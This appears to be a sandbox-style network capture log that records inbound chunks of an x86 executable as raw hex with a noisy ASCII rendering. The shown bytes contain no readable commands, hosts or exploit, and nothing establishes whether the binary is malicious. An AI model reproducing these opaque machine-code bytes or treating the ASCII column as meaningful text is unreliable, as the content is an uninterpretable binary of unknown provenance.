2023-10-05 16:48:01 UTC	47	IN	Data Raw: 05 0c 06 00 00 eb 1c 90 90 90 90 90 90 90 90 90 90 8b 04 24 8b 80 6c 10 00 00 0f b6 cb 8d 04 48 83 c0 0c 0f b7 18 6a 00 6a 02 52 6a 02 8d 84 24 98 00 00 00 50 ff 74 24 28 89 d7 e8 e1 cb 02 00 83 c4 18 8d 8b ff ff fe ff 81 f9 fe ff 0f 00 0f 87 3c ff ff ff 8d 93 00 00 ff 03 c1 ea 0a 81 c2 00 d8 ff ff 8d 4f 01 81 e3 ff 03 00 00 81 cb 00 dc 00 00 66 89 5c 78 02 e9 18 ff ff ff 90 90 90 90 81 4c 24 48 00 00 00 80 8b 44 24 30 8b 4c 24 10 eb 18 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 44 24 30 8b 4c 24 10 89 fa 8b 6c 24 08 8b 5c 24 18 84 db 0f 85 a8 00 00 00 89 54 24 04 8b 3c 24 8b 47 18 8b 4c 24 10 8b 0c 88 89 ea ff 74 24 44 e8 7a a5 00 00 8b 4c 24 14 83 c4 04 8b 47 18 8b 04 88 8b 40 14 89 ee 8b 6c 24 64 8b 54 24 28 89 14 28 8b 47 18 8b 04 88 8b 40 14 8b 54 Data Ascii: $lHjjRj$Pt$(<Of\xL$HD$0L$D$0L$l$\$T$<$GL$t$DzL$G@l$dT$((G@T
2023-10-05 16:48:01 UTC	55	IN	Data Raw: 11 00 00 00 00 00 00 c7 86 14 11 00 00 00 00 00 00 c7 86 18 11 00 00 00 00 00 00 c7 86 1c 11 00 00 00 00 00 00 c7 86 20 11 00 00 01 00 00 00 c7 86 2c 11 00 00 01 00 00 00 c7 86 30 11 00 00 00 00 00 00 c7 86 70 10 00 00 00 00 00 00 c6 86 ac 10 00 00 01 c6 86 5d 01 00 00 00 68 dc 14 4f 00 e8 1c 03 03 00 83 c4 04 89 86 34 11 00 00 68 dc 14 4f 00 e8 09 03 03 00 83 c4 04 89 86 38 11 00 00 c7 86 40 11 00 00 00 00 00 00 c7 86 3c 11 00 00 00 00 00 00 c6 86 44 11 00 00 00 c7 86 dc 20 00 00 00 00 00 00 c6 86 c4 20 00 00 00 c6 86 c6 20 00 00 00 c6 86 c8 20 00 00 00 66 c7 86 ca 20 00 00 00 00 c6 86 cc 20 00 00 00 66 c7 86 ce 20 00 00 00 00 c6 86 d0 20 00 00 00 c7 86 a8 20 00 00 00 00 00 00 c7 86 ac 20 00 00 00 00 00 00 c7 86 b0 20 00 00 00 00 00 00 c7 86 b4 20 00 00 Data Ascii: ,0p]hO4hO8@<D f f
2023-10-05 16:48:01 UTC	63	IN	Data Raw: 46 30 00 00 00 00 80 be 0a 11 00 00 00 74 2c c7 46 10 00 00 00 00 c6 86 42 01 00 00 01 80 be 79 10 00 00 00 75 15 c6 86 79 10 00 00 01 56 68 a0 7a 41 00 e8 49 53 01 00 83 c4 08 8b 86 50 10 00 00 85 c0 74 09 50 e8 46 8d 02 00 83 c4 04 c7 86 54 10 00 00 00 00 00 00 c7 86 58 10 00 00 00 00 00 00 8d 47 0c 6a 00 6a 02 50 e8 92 8c 02 00 83 c4 0c 89 86 50 10 00 00 80 be 5c 01 00 00 00 74 23 8b 86 60 10 00 00 85 c0 74 12 6a 00 6a 06 68 2e d5 4d 00 50 e8 a7 bf 00 00 83 c4 10 c6 86 5d 01 00 00 01 85 ff 0f 8e e2 00 00 00 8b 6c 24 1c 8d 3c 7d 00 00 00 00 01 ef eb 37 90 90 90 90 90 90 89 d8 f7 c3 60 ff 00 00 74 55 8b 6c 24 18 8b 85 50 10 00 00 8b 8d 54 10 00 00 8d 51 01 89 95 54 10 00 00 66 89 1c 48 89 f5 39 fe 0f 83 9c 00 00 00 8d 75 02 0f b7 5d 00 83 fb 0d 75 c3 89 Data Ascii: F0t,FByuyVhzAISPtPFTXGjjPP\t#`tjjh.MP]l$<}7`tUl$PTQTfH9u]u
2023-10-05 16:48:01 UTC	71	IN	Data Raw: d0 83 f8 0a 0f 83 fb 05 00 00 8b 86 90 01 00 00 3d 99 99 99 19 77 14 01 c0 8d 04 80 b9 cf ff ff ff 29 d1 39 c8 0f 86 1c 06 00 00 c7 86 90 01 00 00 ff ff ff ff e9 97 20 00 00 8b 86 18 02 00 00 85 c0 b9 0f 00 00 00 bf 15 00 00 00 0f 44 cf 8d 5a d0 83 fb 0a 0f 82 ce 04 00 00 83 fa 41 0f 8c ac 04 00 00 8d 79 37 39 fa 0f 8f a1 04 00 00 83 c2 c9 e9 b0 04 00 00 8d 42 f9 83 f8 14 0f 87 50 04 00 00 ff 24 85 e0 7c 4c 00 8b 04 24 c7 00 00 00 00 00 e9 39 20 00 00 83 fa 5c 0f 85 9d 02 00 00 89 f1 e8 89 6b 00 00 c7 86 24 0e 00 00 00 00 00 00 e9 1a 20 00 00 81 fa 9c 00 00 00 0f 85 14 02 00 00 89 f1 e8 67 6b 00 00 c7 86 24 0e 00 00 00 00 00 00 e9 f8 1f 00 00 c7 86 24 0e 00 00 00 00 00 00 c6 86 42 01 00 00 01 80 be 79 10 00 00 00 75 19 c6 86 79 10 00 00 01 56 68 a0 7a 41 Data Ascii: =w)9 DZAy79BP$\|L$9 \k$ gk$$ByuyVhzA
2023-10-05 16:48:01 UTC	78	IN	Data Raw: 01 00 00 8b 86 2c 01 00 00 39 c1 0f 47 c8 89 8e 90 01 00 00 85 c9 8b 86 98 00 00 00 ba 01 00 00 00 0f 45 d1 89 c1 85 d2 0f 8e 9b 09 00 00 89 c3 e9 c1 08 00 00 f6 46 01 20 0f 84 52 01 00 00 8b 86 90 01 00 00 8b 8e 2c 01 00 00 39 c8 0f 47 c1 8b be 94 00 00 00 89 86 90 01 00 00 85 c0 ba 01 00 00 00 0f 45 d0 03 96 98 00 00 00 e9 ed 00 00 00 8b 86 2c 01 00 00 8b 8e 90 01 00 00 0f af 86 28 01 00 00 39 c1 0f 46 c1 89 86 90 01 00 00 8b 96 70 10 00 00 85 d2 0f 84 f4 00 00 00 85 c0 0f 84 ec 00 00 00 89 f1 e8 a5 4f 00 00 83 be 90 01 00 00 02 0f 82 d8 00 00 00 bf 01 00 00 00 8b 96 70 10 00 00 89 f1 e8 86 4f 00 00 83 c7 01 3b be 90 01 00 00 72 e8 e9 b6 00 00 00 f6 46 01 20 0f 84 ac 00 00 00 8b 8e 28 01 00 00 8b 86 90 01 00 00 39 c8 0f 47 c1 89 86 90 01 00 00 0f b6 9e Data Ascii: ,9GEF R,9GE,(9FpOpO;rF (9G
2023-10-05 16:48:01 UTC	86	IN	Data Raw: c0 31 c9 8b 54 24 04 39 97 3c 0e 00 00 0f 9f c1 0f 44 c8 80 f9 01 8b 74 24 08 75 4d 31 c0 8b 4c 24 0c 39 8f 38 0e 00 00 0f 9c c0 31 c9 39 b7 34 0e 00 00 0f 9c c1 0f 44 c8 80 f9 01 75 2b 8d 87 34 0e 00 00 c7 87 28 0e 00 00 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 08 00 00 00 00 c7 40 04 00 00 00 00 c7 00 00 00 00 00 8b 44 24 04 0b 04 24 0f 94 c3 0f 85 92 00 00 00 3b b7 28 01 00 00 0f 85 86 00 00 00 85 f6 7e 64 8b 8f 2c 01 00 00 31 c0 89 f2 eb 13 90 90 90 90 90 90 90 90 90 90 90 90 83 c0 01 39 d0 7d 45 85 c9 7e f5 31 d2 be 04 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 4f 18 8b 0c 81 8b 49 14 81 0c 31 ff ff 03 00 83 c2 01 8b 8f 2c 01 00 00 83 c6 14 39 ca 7c e0 8b 97 28 01 00 00 8b 74 24 08 eb b4 80 bf 79 10 00 00 00 75 15 c6 87 79 10 00 00 01 57 68 Data Ascii: 1T$9<Dt$uM1L$98194Du+4(@@@D$$;(~d,19}E~1OI1,9\|(t$yuyWh
2023-10-05 16:48:01 UTC	94	IN	Data Raw: 7e 00 00 00 c6 86 d0 20 00 00 01 89 8e d4 20 00 00 83 c7 01 89 be d8 20 00 00 8b 96 28 01 00 00 85 d2 7e 55 8b 8e 2c 01 00 00 31 c0 eb 0a 90 90 90 83 c0 01 39 d0 7d 41 85 c9 7e f5 31 d2 bf 04 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 4e 18 8b 0c 81 8b 49 14 81 0c 39 ff ff 03 00 83 c2 01 8b 8e 2c 01 00 00 83 c7 14 39 ca 7c e0 8b 96 28 01 00 00 eb b8 80 be 79 10 00 00 00 74 05 83 c4 08 eb 15 c6 86 79 10 00 00 01 56 68 a0 7a 41 00 e8 e8 d5 00 00 83 c4 10 5e 5f 5b 5d c3 55 53 57 56 83 ec 18 89 d7 89 ce 8b 5c 24 38 8b 54 24 34 a1 34 00 50 00 31 e0 89 44 24 14 0f b7 02 3d fe df 00 00 0f 85 92 00 00 00 80 7f 18 00 0f 84 2e 01 00 00 83 fb 01 0f 85 45 01 00 00 f7 44 24 3c 00 00 40 00 75 17 68 6b 17 00 00 68 4e 45 4f 00 68 00 6d 4f 00 e8 46 57 09 00 83 Data Ascii: ~ (~U,19}A~1NI9,9\|(ytyVhzA^_[]USWV\$8T$44P1D$=.ED$<@uhkhNEOhmOFW
2023-10-05 16:48:01 UTC	102	IN	Data Raw: 09 00 83 c4 0c 8b 76 14 8d 04 ad 00 00 00 00 01 e8 8b 7c 86 10 85 ff 74 52 89 44 24 0c 8b 04 24 8b 50 10 01 ef 89 78 10 90 90 90 90 90 90 90 90 90 89 eb 8d 3c ad 00 00 00 00 01 ef 8b 4c be 10 01 cd 85 c9 75 eb 89 d1 29 d9 85 d2 0f 44 ca 8d 44 be 10 89 08 8b 04 24 8b 40 14 8b 4c 24 0c c7 44 88 10 00 00 00 00 8b 5c 24 18 8b 44 24 08 8b 74 24 10 8d 04 86 8b 48 10 89 4e 10 8b 48 0c 89 4e 0c 8b 48 08 89 4e 08 8b 08 8b 50 04 89 56 04 89 0e 8b 48 10 85 c9 0f 84 f4 fe ff ff 89 f2 29 c2 c1 fa 02 69 d2 33 33 33 33 01 d1 89 4e 10 e9 dd fe ff ff 85 db 8b 6c 24 24 74 1d 8d 77 6c f7 db 8d 14 2b 03 97 98 00 00 00 8b 0c 24 56 e8 be ca ff ff 83 c4 04 43 75 e8 83 c4 28 5e 5f 5b 5d c3 53 57 56 89 ce 8a 5c 24 14 8b 44 24 10 85 c0 74 2b 83 f8 01 0f 85 18 04 00 00 8d 42 ff 83 Data Ascii: v\|tRD$$Px<Lu)DD$@L$D\$D$t$HNHNHNPVH)i3333Nl$$twl+$VCu(^_[]SWV\$D$t+B
2023-10-05 16:48:01 UTC	110	IN	Data Raw: 48 4f 00 68 08 94 4f 00 e8 b7 19 09 00 83 c4 0c e8 ac a8 fe ff cc cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 08 8b 44 24 0c 8b 4c 24 04 c7 41 2c 16 00 00 00 50 e8 d7 e8 ff ff 83 c4 04 c3 cc cc cc 55 53 57 56 8b 5c 24 1c 8b 7c 24 18 8b 6c 24 14 6a 00 6a 50 6a 01 e8 25 d1 01 00 83 c4 0c 89 c6 c7 40 40 00 00 00 00 c7 40 44 00 00 00 00 c7 40 48 00 00 00 00 c6 40 4c 00 89 58 04 89 38 8b 44 24 20 89 46 08 8d 5e 0c 53 e8 72 28 02 00 83 c4 04 c7 46 2c 00 00 00 00 8d 46 20 c7 46 20 70 c2 41 00 89 76 24 c6 46 28 00 68 d0 58 42 00 50 53 e8 eb 28 02 00 83 c4 0c 6a 5a 55 e8 30 b4 01 00 83 c4 08 88 46 30 6a 5b 55 e8 22 b4 01 00 83 c4 08 88 46 31 6a 02 55 e8 c4 b4 01 00 83 c4 08 89 46 34 6a 5f 55 e8 b6 b4 01 00 83 c4 08 89 46 38 6a 60 55 e8 a8 b4 01 00 83 c4 08 89 46 3c Data Ascii: HOhOT$D$L$A,PUSWV\$\|$l$jjPj%@@@D@H@LX8D$ F^Sr(F,F F pAv$F(hXBPS(jZU0F0j[U"F1jUF4j_UF8j`UF<
2023-10-05 16:48:01 UTC	118	IN	Data Raw: 90 8b 45 00 8b 40 08 8d 4c 24 34 51 ff 34 98 8d 44 24 18 50 ff b5 dc 00 00 00 56 e8 51 27 00 00 83 c4 14 53 57 ff 75 00 e8 b4 a5 02 00 83 c4 0c 89 c3 85 c0 79 cb 56 6a 00 e8 93 5c 00 00 83 c4 08 6a 00 6a 01 6a 0b 8b b4 24 c8 00 00 00 56 ff 15 cc d8 4f 00 6a 01 6a 00 56 ff 15 54 d8 4f 00 8b 84 24 c8 00 00 00 ff 30 ff 15 ec d8 4f 00 e9 27 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 50 8b 74 24 1c 8b 6c 24 20 b9 02 00 00 00 e8 19 f7 ff ff 89 c7 56 e8 d1 94 01 00 83 c4 04 89 04 24 6a 02 56 e8 b3 95 01 00 83 c4 08 89 c3 55 50 6a 01 ff 37 e8 d3 1d 02 00 83 c4 10 e8 ab d2 fe ff 8d 6f 04 0f b6 c0 53 6a 01 50 55 ff 37 e8 29 95 02 00 83 c4 14 ff 35 7c 77 4c 00 68 a7 22 4e 00 e8 16 a7 01 00 83 c4 08 89 47 2c 89 77 34 55 e8 67 58 00 00 83 c4 04 c6 87 Data Ascii: E@L$4Q4D$PVQ'SWuyVj\jjj$VOjjVTO$0O'USWVPt$l$ V$jVUPj7oSjPU7)5\|wLh"NG,w4UgX
2023-10-05 16:48:01 UTC	125	IN	Data Raw: c1 e1 04 8d 04 89 bf 1f 85 eb 51 f7 ef 89 d0 c1 e8 1f c1 fa 05 01 c2 29 da ff 74 24 30 68 dc 14 4f 00 68 00 02 00 00 68 c0 00 21 50 68 8e 80 4e 00 55 52 ff 76 0c 53 56 e8 14 f9 ff ff 83 c4 28 50 ff 15 84 22 50 00 8b 6e 10 83 c5 03 89 e8 c1 e0 04 8d 04 80 f7 ef 89 d0 c1 e8 1f c1 fa 05 8d 1c 02 83 c3 03 29 dd 8b 46 0c 89 f7 8b 74 24 04 01 f0 ff 74 24 34 68 1d 1d 4e 00 6a 00 68 00 40 01 50 68 33 89 4e 00 6a 0e 55 50 53 57 e8 bf f8 ff ff 83 c4 28 8b 47 0c 01 f0 83 c0 11 ff 74 24 38 68 c0 1e 4e 00 6a 00 68 00 40 01 50 68 33 89 4e 00 6a 0e 55 50 53 57 e8 94 f8 ff ff 83 c4 28 8b 04 24 01 47 0c 83 c4 08 5e 5f 5b 5d c3 cc cc cc 55 53 57 56 83 ec 20 8b 44 24 48 8b 6c 24 44 8b 54 24 38 8b 5c 24 34 80 7c 24 40 00 74 6f 31 ff 39 03 0f 85 1d 04 00 00 8b 74 24 4c b9 7b Data Ascii: Q)t$0hOhh!PhNURvSV(P"Pn)Ft$t$4hNjh@Ph3NjUPSW(Gt$8hNjh@Ph3NjUPSW($G^_[]USWV D$Hl$DT$8\$4\|$@to19t$L{
2023-10-05 16:48:01 UTC	133	IN	Data Raw: eb 1d 31 c9 c6 45 00 26 83 c5 01 0f b6 46 ff 88 45 00 83 c5 01 0f b6 1e 83 c6 01 84 db 74 29 84 c9 74 1e 0f be c1 89 44 24 04 0f b6 c3 50 89 cf e8 9c fe 08 00 89 f9 83 c4 04 3b 44 24 04 74 c2 90 80 fb 26 74 be eb c3 c6 45 00 00 8b 04 24 83 c4 08 5e 5f 5b 5d c3 31 c0 c3 cc cc cc cc cc cc cc 8b 4c 24 08 8b 41 34 3b 44 24 04 74 01 c3 8b 41 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 81 ec 60 01 00 00 8b b4 24 78 01 00 00 a1 34 00 50 00 31 e0 89 84 24 5c 01 00 00 a1 90 22 50 00 85 c0 74 06 39 f0 75 16 eb 21 68 7a 3f 4e 00 ff 15 b8 d8 4f 00 a3 90 22 50 00 39 f0 74 0d 81 fe 11 01 00 00 74 05 83 fe 2b 75 49 8b bc 24 74 01 00 00 31 db 83 7f 24 00 0f 8e ff 00 00 00 8b 84 24 7c 01 00 00 0f b7 e8 90 90 90 90 8b 44 9f 04 89 2c 24 68 a0 07 42 00 8d 54 Data Ascii: 1E&FEt)tD$P;D$t&tE$^_[]1L$A4;D$tA8USWV`$x4P1$\"Pt9u!hz?NO"P9tt+uI$t1$$\|D,$hBT
2023-10-05 16:48:01 UTC	141	IN	Data Raw: 99 bd 00 00 00 89 1f 0f b6 b9 be 00 00 00 89 3e 0f b6 89 bf 00 00 00 89 0a 5e 5f 5b c3 cc cc cc cc 8b 44 24 04 8a 80 d0 00 00 00 c3 cc cc cc cc cc 8a 44 24 08 8b 4c 24 04 88 81 d0 00 00 00 c3 cc 56 8b 74 24 08 8d 46 24 c6 86 c8 00 00 00 00 c7 06 00 00 00 00 68 98 00 00 00 6a 00 50 e8 fe d1 07 00 83 c4 0c c6 86 d0 00 00 00 01 5e c3 cc cc 57 56 8b 74 24 10 8b 7c 24 0c 8b 47 24 83 f8 08 72 1a 68 5a 0a 00 00 68 16 3d 4f 00 68 02 7a 4f 00 e8 2d 9c 08 00 83 c4 0c 8b 47 24 8d 48 01 89 4f 24 89 74 87 04 5e 5f c3 cc cc cc cc cc cc cc 56 8b 74 24 08 ff 76 28 e8 53 54 01 00 83 c4 04 ff 76 2c e8 48 54 01 00 83 c4 04 5e c3 cc cc cc 83 ec 08 a1 34 00 50 00 31 e0 89 44 24 04 89 e0 50 68 28 e9 4c 00 6a 01 6a 00 68 38 e9 4c 00 ff 15 50 d7 4f 00 85 c0 75 14 8b 04 24 8b 08 Data Ascii: >^_[D$D$L$Vt$F$hjP^WVt$\|$G$rhZh=OhzO-G$HO$t^_Vt$v(STv,HT^4P1D$Ph(Ljjh8LPOu$
2023-10-05 16:48:01 UTC	149	IN	Data Raw: ff ff ff 0f 43 c1 c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 20 8b 7c 24 3c 8b 5c 24 38 8b 6c 24 34 a1 34 00 50 00 31 e0 89 44 24 1c 6a 00 6a 10 6a 01 e8 07 35 01 00 83 c4 0c 89 c6 89 28 89 58 04 89 78 08 8b 3d 4c 2b 50 00 89 f8 85 ff 75 2c 68 10 60 42 00 e8 84 46 01 00 83 c4 04 89 c7 a3 4c 2b 50 00 85 c0 75 14 68 10 60 42 00 e8 6c 46 01 00 83 c4 04 a3 4c 2b 50 00 31 ff 89 e3 50 53 e8 b9 51 01 00 eb 0e 90 90 90 90 90 90 90 55 53 e8 d9 51 01 00 83 c4 08 8b 04 24 85 c0 74 2b 8b 40 0c bd ff ff ff ff 39 44 24 04 7c e1 bd 01 00 00 00 74 da 6a 50 68 64 37 4f 00 68 e4 15 4f 00 e8 bc 7c 08 00 83 c4 0c eb c4 8b 44 24 04 89 46 0c 56 57 e8 a6 46 01 00 83 c4 08 39 f0 74 14 6a 63 68 64 37 4f 00 68 82 17 4f 00 e8 91 7c 08 00 83 c4 0c 8b 4c 24 1c 31 e1 e8 c0 84 Data Ascii: CUSWV \|$<\$8l$44P1D$jjj5(Xx=L+Pu,h`BFL+Puh`BlFL+P1PSQUSQ$t+@9D$\|tjPhd7OhO\|D$FVWF9tjchd7OhO\|L$1
2023-10-05 16:48:01 UTC	157	IN	Data Raw: 89 44 24 30 8b 44 24 34 8b 4c 24 30 50 51 68 20 82 42 00 68 b5 e7 4d 00 6a 64 6a 6e 68 f4 eb 4e 00 57 e8 ba 0f 02 00 83 c4 20 c7 40 0c 00 00 00 00 89 06 6a 64 6a 01 57 e8 54 0e 02 00 83 c4 0c 6a 19 6a 4b 6a 02 57 e8 45 0e 02 00 83 c4 10 56 e8 0c 07 02 00 83 c4 04 89 44 24 2c 8b 44 24 2c 50 68 d0 82 42 00 68 b5 e7 4d 00 6a 00 6a 00 57 e8 5c 13 02 00 83 c4 18 c7 40 0c 00 00 00 00 c7 40 28 06 00 00 00 89 46 04 56 e8 d2 06 02 00 83 c4 04 89 44 24 28 8b 44 24 28 50 68 60 83 42 00 68 b5 e7 4d 00 6a 6c 68 8c 76 4e 00 57 e8 6f 12 02 00 83 c4 18 c7 40 0c 01 00 00 00 56 e8 9f 06 02 00 83 c4 04 89 44 24 24 8b 44 24 24 50 68 80 83 42 00 68 b5 e7 4d 00 6a 76 68 00 4b 4e 00 57 e8 3c 12 02 00 83 c4 18 c7 40 0c 01 00 00 00 56 e8 6c 06 02 00 83 c4 04 89 44 24 20 8b 44 24 Data Ascii: D$0D$4L$0PQh BhMjdjnhNW @jdjWTjjKjWEVD$,D$,PhBhMjjW\@@(FVD$(D$(Ph`BhMjlhvNWo@VD$$D$$PhBhMjvhKNW<@VlD$ D$
2023-10-05 16:48:01 UTC	164	IN	Data Raw: 51 08 83 c4 0c 6a 37 ff 76 28 e8 22 dc 00 00 83 c4 08 89 c7 68 f2 bd 4e 00 50 e8 e2 7f 08 00 83 c4 08 8b 0e 8b 11 50 57 51 ff 52 08 83 c4 0c 8b 06 8b 08 6a 01 53 50 ff 51 08 83 c4 0c 89 46 08 c7 46 2c 00 00 00 00 8b 46 20 85 c0 74 09 50 e8 9d 28 ff ff 83 c4 04 8b 4c 24 04 31 e1 e8 df 46 07 00 83 c4 08 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 57 56 83 ec 14 8b 74 24 20 a1 34 00 50 00 31 e0 89 44 24 10 8b 7e 2c 8d 46 3c 50 e8 e0 c2 03 00 83 c4 04 8b 08 89 e2 57 50 52 ff 51 10 83 c4 0c 83 3c 24 00 74 38 8b 46 18 8b 08 6a 00 50 ff 51 58 83 c4 08 8b 46 2c 8b 40 1c ff 30 e8 5f 58 01 00 83 c4 04 8b 14 24 89 f1 50 ff 74 24 10 ff 74 24 10 ff 74 24 10 e8 f5 fd ff ff 83 c4 10 8b 4c 24 10 31 e1 e8 57 46 07 00 83 c4 14 5e 5f c3 cc 8b 44 24 04 ff 70 e8 e8 04 4d 01 00 83 c4 Data Ascii: Qj7v("hNPPWQRjSPQFF,F tP(L$1F^_[]WVt$ 4P1D$~,F<PWPRQ<$t8FjPQXF,@0_X$Pt$t$t$L$1WF^_D$pM
2023-10-05 16:48:01 UTC	172	IN	Data Raw: 00 0f 85 ea 01 00 00 81 fd fb 00 00 00 0f 94 c0 c6 44 24 09 ff b9 1a 83 4e 00 bf 15 83 4e 00 0f 44 f9 00 c0 0c fc 88 44 24 0a 88 54 24 0b 8b 06 8b 08 8d 54 24 09 6a 03 52 50 ff 51 08 83 c4 0c 89 46 4c ff 34 24 57 e9 90 01 00 00 bb c8 f2 4c 00 b8 1c f3 4c 00 81 fd fd 00 00 00 0f 85 ff fe ff ff 8b 48 14 8b 54 8e 20 83 fa 03 0f 84 82 00 00 00 83 fa 02 0f 84 bd 00 00 00 85 d2 0f 85 6e 01 00 00 c7 44 8e 20 01 00 00 00 8b 3b 8b 4c 24 0c 31 e1 e8 69 27 07 00 89 f1 89 fa 83 c4 10 5e 5f 5b 5d e9 b9 01 00 00 c7 44 86 20 02 00 00 00 89 df 8b 03 8b 58 04 c6 44 24 09 ff 88 5c 24 0a 88 54 24 0b 8b 06 8b 08 8d 54 24 09 6a 03 52 50 ff 51 08 83 c4 0c 89 46 4c 8d 83 05 ff ff ff 83 f8 03 0f 83 9f 00 00 00 8b 04 9d d4 f0 4c 00 e9 a6 00 00 00 8b 58 04 c6 44 24 09 ff 88 5c 24 Data Ascii: D$NNDD$T$T$jRPQFL4$WLLHT nD ;L$1i'^_[]D XD$\$T$T$jRPQFLLXD$\$
2023-10-05 16:48:01 UTC	180	IN	Data Raw: c4 0c 68 e1 7e 4e 00 56 e8 e4 39 08 00 83 c4 08 bf 01 00 00 00 85 c0 0f 85 38 fb ff ff eb 2e bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 7d 08 00 00 f6 05 78 77 4c 00 03 0f 85 62 08 00 00 83 bc 24 28 10 00 00 00 0f 85 bb f5 ff ff 6a 00 6a 1e ff b4 24 34 10 00 00 e8 04 a2 00 00 83 c4 0c bf 01 00 00 00 e9 eb fa ff ff ff b4 24 24 10 00 00 68 93 03 4f 00 e8 a6 85 fd ff 83 c4 08 55 e8 ed bd 01 00 83 c4 04 bf 02 00 00 00 8b 9c 24 2c 10 00 00 e9 17 f0 ff ff bf 01 00 00 00 83 bc 24 28 10 00 00 00 0f 88 04 08 00 00 f6 05 78 77 4c 00 03 0f 85 e9 07 00 00 83 bc 24 28 10 00 00 00 0f 85 42 f5 ff ff 6a 01 68 ab 00 00 00 ff b4 24 34 10 00 00 e8 88 a1 00 00 83 c4 0c 68 f2 de 4d 00 56 e8 0a 39 08 00 83 c4 08 bf 01 00 00 00 85 c0 0f 85 8a fa ff ff eb 2e bf 01 00 00 00 83 Data Ascii: h~NV98.$(}xwLb$(jj$4$$hOU$,$(xwL$(Bjh$4hMV9.
2023-10-05 16:48:01 UTC	188	IN	Data Raw: 83 c4 08 0f b6 c0 50 68 c8 36 4e 00 55 e8 9f 40 00 00 83 c4 0c 89 e9 ba ca fe 4d 00 6a 01 68 b1 00 00 00 57 e8 f8 04 00 00 83 c4 0c 68 b2 00 00 00 57 e8 ea 7c 00 00 83 c4 08 89 fe bf 02 00 00 00 b9 02 00 00 00 29 c1 51 68 aa ca 4e 00 55 e8 5d 40 00 00 83 c4 0c 68 b3 00 00 00 56 e8 bf 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 80 cc 4e 00 55 e8 39 40 00 00 83 c4 0c 68 b4 00 00 00 56 e8 9b 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 99 cc 4e 00 55 e8 15 40 00 00 83 c4 0c 68 bb 00 00 00 56 e8 77 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 da c7 4e 00 55 e8 f1 3f 00 00 83 c4 0c 68 b5 00 00 00 56 e8 53 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 3d c8 4e 00 55 e8 cd 3f 00 00 83 c4 0c 68 b6 00 00 00 56 e8 2f 7c 00 00 83 c4 08 b9 02 00 00 00 29 c1 51 68 67 Data Ascii: Ph6NU@MjhWhW\|)QhNU]@hV\|)QhNU9@hV\|)QhNU@hVw\|)QhNU?hVS\|)Qh=NU?hV/\|)Qhg
2023-10-05 16:48:01 UTC	196	IN	Data Raw: 60 4e 00 e8 09 59 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 7a 60 4e 00 55 e8 23 22 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 5d 53 e8 af 63 00 00 83 c4 0c 6a 00 68 56 d8 4d 00 e8 d0 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 56 d8 4d 00 55 e8 ea 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 5e 53 e8 76 63 00 00 83 c4 0c 6a 00 68 af dc 4d 00 e8 97 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 af dc 4d 00 55 e8 b1 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 66 53 e8 3d 63 00 00 83 c4 0c 6a 01 68 03 f3 4d 00 e8 5e 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 03 f3 4d 00 55 e8 78 21 00 00 83 c4 0c 85 c0 0f 95 c0 0f b6 c0 50 6a 67 53 e8 04 63 00 00 83 c4 0c 6a 00 68 99 dc 4d 00 e8 25 58 03 00 83 c4 08 85 ed 74 17 0f b6 c0 50 68 99 dc 4d 00 55 e8 3f Data Ascii: `NYtPhz`NU#"Pj]ScjhVMXtPhVMU!Pj^SvcjhMXtPhMU!PjfS=cjhM^XtPhMUx!PjgScjhM%XtPhMU?
2023-10-05 16:48:01 UTC	203	IN	Data Raw: 00 85 c0 74 3e 89 c7 56 50 e8 83 06 00 00 83 c4 08 84 c0 74 25 8d 6e 0c 90 90 90 90 90 90 90 90 90 6a 00 55 e8 98 52 00 00 83 c4 08 56 57 e8 5e 06 00 00 83 c4 08 84 c0 75 e7 57 e8 11 02 00 00 83 c4 04 89 f0 83 c0 0c 6a 00 50 e8 71 52 00 00 83 c4 08 56 e8 d8 60 00 00 83 c4 04 89 43 08 c7 03 01 00 00 00 bf 01 00 00 00 80 38 00 bd 01 00 00 00 74 3a 89 c6 bd 01 00 00 00 90 90 90 90 90 90 68 b0 fe 4d 00 56 e8 a5 db 07 00 83 c4 08 85 c0 74 0e 83 c5 01 89 2b 90 90 90 90 90 90 90 90 90 80 3e 00 8d 76 01 75 f8 80 3e 00 75 d3 83 c5 01 6a 00 6a 04 55 e8 c6 59 00 00 83 c4 0c 89 43 04 c7 00 b0 fe 4d 00 8b 73 08 80 3e 00 74 3f bf 01 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 68 b0 fe 4d 00 56 e8 45 db 07 00 83 c4 08 85 c0 74 0e 8b 43 04 89 34 b8 83 c7 01 90 90 90 Data Ascii: t>VPt%njURVW^uWjPqRV`C8t:hMVt+>vu>ujjUYCMs>t?hMVEtC4
